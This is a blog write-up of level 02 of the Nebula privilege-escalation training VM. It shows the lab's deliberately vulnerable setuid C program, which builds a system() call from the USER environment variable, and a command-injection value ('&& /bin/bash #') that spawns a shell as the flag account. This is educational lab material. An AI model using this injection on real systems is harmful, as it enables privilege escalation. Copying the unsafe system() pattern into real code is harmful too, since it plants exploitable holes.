---
layout: post
title: "Nebula Series - Level 02"
---

Nebula is the first in a series of VMs from Exploit Exercises. It consists of 20 levels which range
in difficulty from simple to intermediate and cover topics like Linux privilege escalation and file
system race conditions.

Level 02 is a quick one thanks to an application that trusts us blindly.

<!--more-->

Ok, so the first thing to understand is that you shouldn't trust the user. If the application
executes a command that is built either entirely or partially from user input, it's vulnerable to
command injection.

Inspecting the executable in the flag account's home directory `/home/flag02` we again see that it
is `setuid` and is owned by `flag02`.

To make our lives easier, we are also provided with the source:

```c
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <sys/types.h>
#include <stdio.h>

int main(int argc, char **argv, char **envp)
{
  char *buffer;

  gid_t gid;
  uid_t uid;

  gid = getegid();
  uid = geteuid();

  setresgid(gid, gid, gid);
  setresuid(uid, uid, uid);

  buffer = NULL;

  asprintf(&buffer, "/bin/echo %s is cool", getenv("USER"));
  printf("about to call system(\"%s\")\n", buffer);

  system(buffer);
}
```

Again, the application sets our **REAL** uid & gid to our **EFFECTIVE** uid & gid which means
as far as the running process is concerned, we are user `flag02`; now we just need to get it to do
our bidding.


The application builds up the command using the value in the `$USER` environment variable, stores it in the
buffer, and eventually executes it.

```c
asprintf(&buffer, "/bin/echo %s is cool", getenv("USER"));
...
system(buffer)
```

Our goal is to craft a value for the `$USER` variable such that we are provided with a shell when the command is run.


We can short circuit the call to `/bin/echo` with `&&`, invoke `/bin/bash`, and comment out the rest
of the command with `#`:

```bash
$ USER='&& /bin/bash #' /home/flag02/flag02
```

The resulting command is

```bash
/bin/echo && /bin/bash # is cool
```

The `#` at the end is crucial because without it `bash` would try to execute a non-existent file called `is` and fail.
Instead, we are presented with a shell as `flag02` which we can verify with `whoami` if we're in doubt.

To complete the level we use our escalated privileges to run getflag

```bash
$ getflag

"You have successfully executed getflag on a target account"
```

In summary:

- assume all input is malicious
- if possible, avoid dynamically composing commands with user provided data
